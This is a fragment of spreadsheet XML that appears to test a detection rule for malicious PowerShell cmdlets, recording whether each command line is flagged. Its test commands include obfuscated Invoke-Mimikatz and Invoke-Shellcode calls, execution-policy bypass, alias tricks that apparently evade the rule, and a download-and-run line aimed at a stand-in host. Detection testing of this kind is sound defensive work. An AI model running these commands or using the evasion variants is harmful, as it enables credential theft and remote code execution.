          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1127" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1127" s="36" t="n"/>
      <c r="J1127" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1127" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1128" ht="15.75" customHeight="1" s="42">
      <c r="A1128" s="43" t="n"/>
      <c r="B1128" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1128" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1128" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1128" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1128" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1128" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1128" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1128" s="43" t="n"/>
      <c r="J1128" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1128" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1129" ht="15.75" customHeight="1" s="42">
      <c r="A1129" s="43" t="n"/>
      <c r="B1129" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1129" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1129" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1129" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1129" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1129" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1129" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1129" s="36" t="n"/>
      <c r="J1129" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1129" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1130" ht="15.75" customHeight="1" s="42">
      <c r="A1130" s="43" t="n"/>
      <c r="B1130" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1130" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1130" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1130" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1130" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1130" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1130" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1130" s="43" t="n"/>
      <c r="J1130" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1130" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1131" ht="15.75" customHeight="1" s="42">
      <c r="A1131" s="43" t="n"/>
      <c r="B1131" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1131" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1131" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1131" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1131" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1131" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1131" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I113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131" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1131" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1132" ht="15.75" customHeight="1" s="42">
      <c r="A1132" s="43" t="n"/>
      <c r="B1132" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1132" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1132" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1132" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1132" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1132" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1132" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I113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132" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1132" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1133" ht="15.75" customHeight="1" s="42">
      <c r="A1133" s="43" t="n"/>
      <c r="B1133" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1133" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1133" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1133" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1133" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I113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133" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1133" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1134" ht="15.75" customHeight="1" s="42">
      <c r="A1134" s="43" t="n"/>
      <c r="B1134" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1134" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1134" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1134" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1134" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I113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134" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1134" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1135" ht="15.75" customHeight="1" s="42">
      <c r="A1135" s="43" t="n"/>
      <c r="B1135" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1135" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1135" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1135" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1135" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I113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135" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1135" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1136" ht="15.75" customHeight="1" s="42">
      <c r="A1136" s="43" t="n"/>
      <c r="B1136" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1136" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1136" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1136" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1136" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I113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136" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1136" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1137" ht="15.75" customHeight="1" s="42">
      <c r="A1137" s="43" t="n"/>
      <c r="B1137" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1137" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1137" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1137" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1137" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1137" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1137" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I113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137" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1137" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1138" ht="15.75" customHeight="1" s="42">
      <c r="A1138" s="43" t="n"/>
      <c r="B1138" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1138" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1138" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1138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1138" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1138" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1138" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1138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38" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1138" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1139" ht="15.75" customHeight="1" s="42">
      <c r="A1139" s="43" t="n"/>
      <c r="B1139" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1139" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1139" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1139" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1139" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1139" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1139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39" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1139" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1140" ht="15.75" customHeight="1" s="42">
      <c r="A1140" s="43" t="n"/>
      <c r="B1140" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1140" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1140" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1140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1140" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1140" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1140" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1140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140" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1140" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1141" ht="15.75" customHeight="1" s="42">
      <c r="A1141" s="43" t="n"/>
      <c r="B1141" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1141" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1141" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1141" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1141" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1141" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1141" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1141" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1141" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1142" ht="15.75" customHeight="1" s="42">
      <c r="A1142" s="43" t="n"/>
      <c r="B1142" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1142" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1142" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1142" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1142" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1142" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1142" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1142" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1142" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1142" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1143" ht="15.75" customHeight="1" s="42">
      <c r="A1143" s="43" t="n"/>
      <c r="B1143" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1143" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1143" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1143" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1143" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1143" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1143" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1143" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1143" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1143" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1144" ht="15.75" customHeight="1" s="42">
      <c r="A1144" s="43" t="n"/>
      <c r="B1144" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1144" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1144" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1144" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1144" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1144" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1144" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1144" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1144" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1144" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1145" ht="15.75" customHeight="1" s="42">
      <c r="A1145" s="43" t="n"/>
      <c r="B1145" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1145" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1145" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1145" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1145" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1145" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1145" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1145" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1145" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1145" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1146" ht="15.75" customHeight="1" s="42">
      <c r="A1146" s="43" t="n"/>
      <c r="B1146" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1146" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1146" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1146" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1146" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1146" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1146" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1146" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1146" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1146" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1147" ht="15.75" customHeight="1" s="42">
      <c r="A1147" s="43" t="n"/>
      <c r="B1147" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1147" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1147" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1147" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1147" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1147" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1147" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1147" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1147" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1147" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1148" ht="15.75" customHeight="1" s="42">
      <c r="A1148" s="43" t="n"/>
      <c r="B1148" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1148" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1148" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1148" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1148" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1148" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1148" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1148" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1148" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1148" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1149" ht="15.75" customHeight="1" s="42">
      <c r="A1149" s="43" t="n"/>
      <c r="B1149" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1149" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1149" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1149" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1149" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1149" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1149" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1149" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1149" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1150" ht="15.75" customHeight="1" s="42">
      <c r="A1150" s="43" t="n"/>
      <c r="B1150" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1150" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1150" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1150" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1150" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1150" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1150" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1150" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1150" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1150" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1151" ht="15.75" customHeight="1" s="42">
      <c r="A1151" s="43" t="n"/>
      <c r="B1151" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1151" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1151" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1151" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1151" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1151" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1151" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1151" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1151" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1151" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1152" ht="15.75" customHeight="1" s="42">
      <c r="A1152" s="43" t="n"/>
      <c r="B1152" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1152" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1152" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1152" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1152" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1152" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1152" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1152" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1152" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1152" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1153" ht="15.75" customHeight="1" s="42">
      <c r="A1153" s="43" t="n"/>
      <c r="B1153" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1153" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1153" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1153" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1153" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1153" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1153" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I115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53" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1153" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1154" ht="15.75" customHeight="1" s="42">
      <c r="A1154" s="43" t="n"/>
      <c r="B1154" s="36" t="inlineStr">
        <is>
